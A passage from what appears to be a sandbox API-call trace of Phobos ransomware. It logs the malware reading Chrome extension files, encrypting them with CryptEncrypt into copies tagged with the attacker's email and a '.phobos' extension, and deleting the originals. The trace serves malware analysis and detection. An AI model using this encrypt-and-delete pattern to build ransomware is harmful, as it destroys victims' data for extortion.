data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0161.059] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=234) returned 1 [0161.059] CloseHandle (hObject=0x14c) returned 1 [0161.059] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json")) returned 0x2020 [0161.059] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0161.059] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0161.059] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0161.060] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0161.060] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0161.063] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32c68) returned 1 [0161.063] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0161.063] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xea, lpOverlapped=0x0) returned 1 [0161.067] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0161.067] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0161.069] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0161.072] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0161.072] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0161.072] CryptDestroyKey (hKey=0xa32968) returned 1 [0161.072] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0161.072] CryptDestroyKey (hKey=0xa32c68) returned 1 [0161.072] CloseHandle (hObject=0x14c) returned 1 [0161.072] CloseHandle (hObject=0x188) returned 1 [0161.072] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json")) returned 1 [0161.073] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0161.073] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0161.073] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=295) returned 1 [0161.073] CloseHandle (hObject=0x188) returned 1 [0161.073] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json")) returned 0x2020 [0161.073] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0161.074] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0161.074] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0161.074] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0161.074] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0161.076] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0161.076] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0161.076] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x127, lpOverlapped=0x0) returned 1 [0161.077] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x130, dwBufLen=0x130 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x130) returned 1 [0161.077] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x130, lpOverlapped=0x0) returned 1 [0161.078] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0161.078] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0161.078] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0161.078] CryptDestroyKey (hKey=0xa32da8) returned 1 [0161.078] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0161.078] CryptDestroyKey (hKey=0xa32968) returned 1 [0161.078] CloseHandle (hObject=0x188) returned 1 [0161.078] CloseHandle (hObject=0x14c) returned 1 [0161.078] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\messages.json")) returned 1 [0161.079] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0161.079] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0161.080] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=324) returned 1 [0161.080] CloseHandle (hObject=0x14c) returned 1 [0161.080] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json")) returned 0x2020 [0161.080] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0161.080] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0161.080] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0161.080] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0161.080] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0161.081] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0161.081] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0161.081] ReadFile (in: hFile=0x14c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x144, lpOverlapped=0x0) returned 1 [0161.107] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x150, dwBufLen=0x150 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x150) returned 1 [0161.107] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x150, lpOverlapped=0x0) returned 1 [0161.108] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0161.108] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0161.108] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0161.108] CryptDestroyKey (hKey=0xa327e8) returned 1 [0161.108] WriteFile (in: hFile=0x188, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0161.108] CryptDestroyKey (hKey=0xa32968) returned 1 [0161.108] CloseHandle (hObject=0x14c) returned 1 [0161.109] CloseHandle (hObject=0x188) returned 1 [0161.109] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\messages.json")) returned 1 [0161.114] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0161.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0161.114] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=573631) returned 1 [0161.115] CloseHandle (hObject=0x188) returned 1 [0161.115] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js")) returned 0x2020 [0161.115] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0161.115] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0161.115] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0161.115] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0161.115] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0161.115] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0161.115] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0161.115] ReadFile (in: hFile=0x188, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x8c0bf, lpOverlapped=0x0) returned 1 [0161.483] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8c0c0, dwBufLen=0x8c0c0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8c0c0) returned 1 [0161.487] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x8c0c0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x8c0c0, lpOverlapped=0x0) returned 1 [0161.672] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0161.672] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0161.672] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0161.672] CryptDestroyKey (hKey=0xa32da8) returned 1 [0161.672] WriteFile (in: hFile=0x14c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0161.672] CryptDestroyKey (hKey=0xa32968) returned 1 [0161.672] CloseHandle (hObject=0x188) returned 1 [0161.672] CloseHandle (hObject=0x14c) returned 1 [0161.672] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js")) returned 1 [0161.677] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0161.677] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0161.678] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=70113) returned 1 [0161.678] CloseHandle (hObject=0x14c) returned 1 [0161.678] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html")) returned 0x2020 [0161.678] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0161.678] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0161.678] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, 